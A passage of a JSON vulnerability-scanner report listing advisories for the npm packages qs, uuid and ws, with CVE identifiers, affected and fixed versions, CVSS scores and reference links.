through `maybeMap` unchanged and reach the `join(',')` step as-is. For `{ a: [null, 'b'] }` this produces `a=,b`, matching the non-`encodeValuesOnly` comma path (which already joins before encoding and produces `a=%2Cb` for the same input). Single-element `[null]` arrays still collapse via the existing `obj.join(',') || null` and remain subject to `skipNulls` / `strictNullHandling` in the main loop.\n\n\n\n### Affected versions\n\n\n\n`\u003e=6.11.1 \u003c6.15.2` — fixed in v6.15.2.\n\n\n\nThe vulnerable code shape was introduced in 4c4b23d and first shipped in v6.11.1. Earlier versions — including all of 6.7.x, 6.8.x, 6.9.x, 6.10.x, and 6.11.0 — implemented the comma + `encodeValuesOnly` path differently (joining before encoding) and are not affected. Empirically verified across released versions.\n\n\n\n### Impact\n\n\n\nApplication code that calls `qs.stringify` with both `arrayFormat: 'comma'` and `encodeValuesOnly: true` (both non-default) on input that may contain a `null` or `undefined` array element will throw synchronously instead of producing a query string. In a typical Node.js HTTP framework (Express, Fastify, Koa, hapi) the sync throw is caught by the framework's error boundary and the affected request returns a 500; the worker process does not exit and subsequent requests are unaffected. The \"kills the worker process\" framing applies only to call sites outside a request-handler error boundary (background jobs, startup paths, stream pipelines) or to deployments with framework error handling explicitly disabled.\n\n\n\nThe vulnerable input is a `null` or `undefined` entry inside an array; this is reachable from JSON request bodies or from application code constructing arrays from user input, but not from standard HTML form submissions (which produce strings or omitted fields, not literal `null`).", "Severity": "MEDIUM", "CweIDs": [ "CWE-476" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", "V3Score": 5.3, "V40Score": 6.3 } }, "References": [ "https://github.com/ljharb/qs", "https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41", "https://github.com/ljharb/qs/security/advisories/GHSA-q8mj-m7cp-5q26", "https://nvd.nist.gov/vuln/detail/CVE-2026-8723" ], "PublishedDate": "2026-05-17T00:16:21.233Z", "LastModifiedDate": "2026-05-18T20:23:20.24Z" }, { "VulnerabilityID": "CVE-2026-41907", "VendorIDs": [ "GHSA-w5hq-g745-h8pq" ], "PkgID": "uuid@10.0.0", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@10.0.0", "UID": "3aebb3e4d3409ba3" }, "InstalledVersion": "10.0.0", "FixedVersion": "11.1.1, 12.0.1, 13.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41907", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:f52ae8dc1a017d71721e07bbe869499169d8a5c5e9c3253a4e2eb108b32bcce2", "Title": "uuid: uuid: Out-of-bounds write vulnerability impacts data integrity and confidentiality", "Description": "uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-787", "CWE-823" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V3Score": 7.5, "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "V3Score": 4.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-41907", "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/32389c887c9e75f90442ee4cc95bbab0c4e8346e", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "https://github.com/uuidjs/uuid/commit/3d61d6ac1f782cf6b1dd8661c60f11722cd49a0d", "https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a", "https://github.com/uuidjs/uuid/releases/tag/v11.1.1", "https://github.com/uuidjs/uuid/releases/tag/v12.0.1", "https://github.com/uuidjs/uuid/releases/tag/v13.0.1", "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "https://nvd.nist.gov/vuln/detail/CVE-2026-41907", "https://www.cve.org/CVERecord?id=CVE-2026-41907" ], "PublishedDate": "2026-04-24T19:17:14.49Z", "LastModifiedDate": "2026-05-11T13:53:19.343Z" }, { "VulnerabilityID": "CVE-2026-41907", "VendorIDs": [ "GHSA-w5hq-g745-h8pq" ], "PkgID": "uuid@8.3.2", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@8.3.2", "UID": "6e5d7e5bc86220f1" }, "InstalledVersion": "8.3.2", "FixedVersion": "11.1.1, 12.0.1, 13.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41907", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e18b8892b872dd486112ee2d6f01dc328840284a7b7ecd6c2508acdb20db0944", "Title": "uuid: uuid: Out-of-bounds write vulnerability impacts data integrity and confidentiality", "Description": "uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-787", "CWE-823" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V3Score": 7.5, "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "V3Score": 4.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-41907", "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/32389c887c9e75f90442ee4cc95bbab0c4e8346e", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "https://github.com/uuidjs/uuid/commit/3d61d6ac1f782cf6b1dd8661c60f11722cd49a0d", "https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a", "https://github.com/uuidjs/uuid/releases/tag/v11.1.1", "https://github.com/uuidjs/uuid/releases/tag/v12.0.1", "https://github.com/uuidjs/uuid/releases/tag/v13.0.1", "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "https://nvd.nist.gov/vuln/detail/CVE-2026-41907", "https://www.cve.org/CVERecord?id=CVE-2026-41907" ], "PublishedDate": "2026-04-24T19:17:14.49Z", "LastModifiedDate": "2026-05-11T13:53:19.343Z" }, { "VulnerabilityID": "CVE-2026-41907", "VendorIDs": [ "GHSA-w5hq-g745-h8pq" ], "PkgID": "uuid@9.0.1", "PkgName": "uuid", "PkgIdentifier": { "PURL": "pkg:npm/uuid@9.0.1", "UID": "f9285e1af833eb69" }, "InstalledVersion": "9.0.1", "FixedVersion": "11.1.1, 12.0.1, 13.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41907", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:af3fc31299d42b99c289f714136339996a3572ed4bd86a5404c9270f121301d3", "Title": "uuid: uuid: Out-of-bounds write vulnerability impacts data integrity and confidentiality", "Description": "uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-787", "CWE-823" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V3Score": 7.5, "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "V3Score": 4.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-41907", "https://github.com/uuidjs/uuid", "https://github.com/uuidjs/uuid/commit/32389c887c9e75f90442ee4cc95bbab0c4e8346e", "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "https://github.com/uuidjs/uuid/commit/3d61d6ac1f782cf6b1dd8661c60f11722cd49a0d", "https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a", "https://github.com/uuidjs/uuid/releases/tag/v11.1.1", "https://github.com/uuidjs/uuid/releases/tag/v12.0.1", "https://github.com/uuidjs/uuid/releases/tag/v13.0.1", "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "https://nvd.nist.gov/vuln/detail/CVE-2026-41907", "https://www.cve.org/CVERecord?id=CVE-2026-41907" ], "PublishedDate": "2026-04-24T19:17:14.49Z", "LastModifiedDate": "2026-05-11T13:53:19.343Z" }, { "VulnerabilityID": "CVE-2026-45736", "VendorIDs": [ "GHSA-58qx-3vcg-4xpx" ], "PkgID": "ws@8.18.3", "PkgName": "ws", "PkgIdentifier": { "PURL": "pkg:npm/ws@8.18.3", "UID": "eed5161b69f5e052" }, "InstalledVersion": "8.18.3", "FixedVersion": "8.20.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45736", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:14dd2b1ac553b21cd72e683d6de57a1e51f585db0f412a8eb4c7000e065b4ff7", "Title": "ws is an open source WebSocket client and server for Node.js. Prior to ...", "Description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", "Severity": "MEDIUM", "CweIDs": [ "CWE-908" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "V3Score": 4.4 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/websockets/ws", "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086", "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx", "https://nvd.nist.gov/vuln/detail/CVE-2026-45736" ], "PublishedDate": "2026-05-15T15:16:54.103Z", "LastModifiedDate": "2026-05-19T14:39:20.353Z" } ] } ] }